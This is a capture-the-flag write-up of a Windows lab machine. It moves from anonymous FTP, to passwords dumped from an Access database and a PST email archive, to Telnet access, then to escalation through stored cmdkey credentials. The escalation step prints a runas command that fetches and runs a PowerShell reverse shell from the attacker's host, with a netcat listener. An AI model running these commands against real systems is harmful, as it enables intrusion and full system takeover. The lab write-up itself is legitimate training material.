Machine Overview

The target is a Windows machine running Microsoft IIS 7.5 on port 80, Microsoft FTP Service on port 21 with anonymous access enabled, and Microsoft Telnet Service on port 23. The initial attack vector involves anonymous FTP access, which reveals a Microsoft Access database containing credentials. The database credentials provide access to a password-protected ZIP file containing an email archive, which ultimately leads to Telnet access. Privilege escalation is achieved through stored Windows credentials using cmdkey and runas.

Enumeration

Nmap Scan

We begin with service and version scan:

nmap -A -oN access.nmap 10.10.10.98

Scan Results:

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
23/tcp open  telnet  Microsoft Windows XP telnetd
| telnet-ntlm-info:
|   Target_Name: ACCESS
|   NetBIOS_Domain_Name: ACCESS
|   NetBIOS_Computer_Name: ACCESS
|   DNS_Domain_Name: ACCESS
|   DNS_Computer_Name: ACCESS
|_  Product_Version: 6.1.7600
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
| http-methods:
|_  Potentially risky methods: TRACE

Key findings:

• Port 21: FTP service allows anonymous login
• Port 23: Telnet service available (Windows XP telnetd)
• Port 80: IIS 7.5 hosting "MegaCorp" website

FTP Enumeration

Anonymous FTP access is enabled, so we connect and explore the directory structure:

$ ftp 10.10.10.98

Connected to 10.10.10.98.
220 Microsoft FTP Service
Name (10.10.10.98:rether): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  08:16PM       <DIR>          Backups
08-24-18  09:00PM       <DIR>          Engineer

Two directories are discovered: Backups and Engineer. Let's explore both.

Extracting Backup Database

Inside the Backups directory, we find a file called backup.mdb (Microsoft Access database format). We attempt to download it:

ftp> cd Backups
ftp> get backup.mdb
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 28296 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
5652480 bytes received in 0,5921 seconds (9,1039 Mbytes/s)

The FTP client warning indicates that the server performed ASCII-mode line-ending conversions during transfer. Since backup.mdb is a binary Microsoft Access database file, ASCII-mode conversion corrupts the file by altering byte sequences that aren't text line endings.

To avoid corruption, we switch the transfer mode to binary (TYPE I) and download the file again:

ftp> binary
200 Type set to I.

ftp> get backup.mdb
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
5652480 bytes received in 1,2567 seconds (4,2897 Mbytes/s)

Extracting ZIP Archive

In the Engineer directory, we find a password-protected ZIP file called Access Control.zip:

ftp> cd ../Engineer
ftp> get "Access Control.zip"
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
10870 bytes received in 0,0500 seconds (212,3726 kbytes/s)

Database Credential Extraction

Using mdb-tools, we extract data from the backup.mdb file:

mdb-export backup.mdb auth_user

Extracted Data:

id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,

The database contains user credentials. Most notably, the engineer user has the password access4u@security:

engineer: access4u@security

Telnet Authentication Attempt

We attempt to connect to the Telnet service using the discovered credentials engineer:access4u@security:

$ telnet 10.10.10.98 23

Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service

login: engineer
password: access4u@security
Access Denied: Specified user is not a member of TelnetClients group.
Server administrator must add this user to the above group.

The server accepted the credentials (authentication completed) but immediately denied an interactive session due to group membership restrictions. In other words, we successfully authenticated as engineer, but were not authorized to open a Telnet session because the account is not in the TelnetClients group. This indicates valid credentials, but insufficient privileges for Telnet access.

Email Archive Analysis

The Access Control.zip file is password-protected. Using access4u@security as the password, we extract the archive:

7z x "Access Control.zip" -p"access4u@security"

The extracted file is a .pst file (Microsoft Outlook Personal Storage Table). We use readpst to extract the email contents:

$ readpst -r -o pst_out "Access Control.pst"

Opening PST file and indexes...
Processing Folder "Deleted Items"
    "Access Control" - 2 items done, 0 items skipped.

Looking at the extracted data, we find a file called mbox. Inside this file, we discover an email:

From "john@megacorp.com" Fri Aug 24 01:44:07 2018
Status: RO
From: john@megacorp.com <john@megacorp.com>
Subject: MegaCorp Access Control System "security" account
To: 'security@accesscontrolsystems.com'
Date: Thu, 23 Aug 2018 23:44:07 +0100
MIME-Version: 1.0

<...SNIPPED...>

Hi there,

The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.

Regards,

John

The email reveals that the password for the security account has been changed to 4Cc3ssC0ntr0ller.

Initial Access

We use the credentials security:4Cc3ssC0ntr0ller to log in to the system via Telnet:

$ telnet 10.10.10.98 23

Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service

login: security
password: 4Cc3ssC0ntr0ller

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>whoami
access\security

We have successfully obtained a shell running as the security user.

User flag

C:\Users\security\Desktop\user.txt

Privilege Escalation (security → administrator)

Discovering Stored Credentials

Windows cmdkey utility manages stored credentials. We check for any stored credentials:

cmdkey /list

Output:

C:\Users\Public\Desktop>cmdkey /list

Currently stored credentials:

    Target: Domain:interactive=ACCESS\Administrator
                                                       Type: Domain Password
    User: ACCESS\Administrator

The output reveals that credentials for ACCESS\Administrator are stored in Windows Credential Manager. This allows us to use the runas command with the /savecred flag to execute commands as the administrator without prompting for a password.

Obtaining Administrator Shell

To obtain a reverse shell as the administrator, we set up a web server to host a PowerShell reverse shell script and a netcat listener:

On our attacking machine:

# Start HTTP server to host PowerShell script
python3 -m http.server 1337

# Start netcat listener in another terminal
nc -lnvp 4444

We use the mini-reverse.ps1 PowerShell script from Serizao's gist (demonstrated in this Hacking Articles article).

On the target machine (via Telnet):

runas /savecred /user:ACCESS\Administrator "powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.19:1337/mini-reverse.ps1')"

Reverse Shell Connection:

> whoami
access\administrator

We have successfully escalated privileges and obtained a shell running as the administrator user.

Root flag

C:\Users\Administrator\Desktop\root.txt